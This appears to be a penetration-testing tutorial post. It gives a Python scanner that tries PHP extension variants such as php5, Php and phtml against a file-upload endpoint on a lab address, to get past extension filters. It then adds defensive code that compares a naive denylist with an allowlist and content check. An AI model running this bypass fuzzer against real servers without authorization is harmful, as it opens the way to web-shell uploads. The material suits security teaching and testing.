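:::info
💘 Full penetration-testing workflow:
Information gathering – vulnerability discovery – vulnerability 👣 exploitation – privilege escalation – tunnel setup – internal network penetration – lateral movement – post-exploitation
:::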
File Upload Vulnerability Scanner
V1.0
```python
#!/usr/bin/env python3
'''
File upload vulnerability scanner
1. Find the upload endpoint
2. Upload a file (bypass)
3. Verify the response (usually text such as "success" or the file path)
'''
import requests

file_path = './img/1.jpg'
fuzz_file_ext = ['php', 'php3', 'php5', 'Php', 'pHP', 'phtml']


def check_file_upload(url, file_path, fuzz_file_ext):
    try:
        # Read the file once: reusing one open handle would leave it at EOF
        # and send an empty body on every request after the first.
        with open(file_path, 'rb') as file:
            content = file.read()
        for ext in fuzz_file_ext:
            file_name = f'image.{ext}'
            files = {'upload_file': (file_name, content)}
            data = {'submit': 'true'}
            response = requests.post(url, data=data, files=files, timeout=10)
            ### TODO: the upload-success condition needs to be improved ###
            if 'success' in response.text:
                print(f'[+] upload file success. filename: {file_name}')
                break
            else:
                print(f'[-] upload file failed, there is no vul. filename: {file_name}')
    except Exception as e:
        print('[x] upload file exception !!! ')
        print(e)


if __name__ == '__main__':
    url = 'http://192.168.225.135:89/Pass-01/index.php'
    check_file_upload(url, file_path, fuzz_file_ext)
```
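The server-side counterpart to the scanner's extension list, as an added example that is not part of the original post: a case-sensitive denylist lets most of those names through, while an allowlist with a content check and a server-generated name rejects all of them. The function names, the `ALLOWED` policy and the sample bytes are assumptions made for this sketch.

```python
import os
import secrets

# Assumed policy: the endpoint only accepts these image types,
# keyed by lowercase extension with the expected leading magic bytes.
ALLOWED = {
    "jpg": b"\xff\xd8\xff",
    "jpeg": b"\xff\xd8\xff",
    "png": b"\x89PNG\r\n\x1a\n",
    "gif": b"GIF8",
}


def naive_denylist_ok(filename):
    """Weak check: case-sensitive denylist of one extension."""
    return not filename.endswith(".php")


def validate_upload(filename, content):
    """Return a server-generated storage name, or None if rejected."""
    # Drop any client-supplied directory part, then split off the extension.
    base = os.path.basename(filename.replace("\\", "/"))
    stem, dot, ext = base.rpartition(".")
    ext = ext.lower()  # normalise case before comparing
    if not dot or not stem or ext not in ALLOWED:
        return None
    # The content must match the type the extension claims.
    if not content.startswith(ALLOWED[ext]):
        return None
    # Never store under the client's name; generate one server-side.
    return f"{secrets.token_hex(16)}.{ext}"


# Constructed sample inputs: the scanner's file names and a minimal JPEG header.
SCANNER_NAMES = [f"image.{e}" for e in
                 ["php", "php3", "php5", "Php", "pHP", "phtml"]]
JPEG_BYTES = b"\xff\xd8\xff\xe0" + b"\x00" * 16


def compare():
    """(name, accepted by denylist, accepted by allowlist) for each sample."""
    return [(n, naive_denylist_ok(n), validate_upload(n, JPEG_BYTES) is not None)
            for n in SCANNER_NAMES + ["photo.JPG"]]


if __name__ == "__main__":
    for name, weak, strict in compare():
        print(f"{name:12} denylist={'accept' if weak else 'reject'} "
              f"allowlist={'accept' if strict else 'reject'}")
```

Storing uploads outside the web root, or in a directory where script execution is disabled, complements this check.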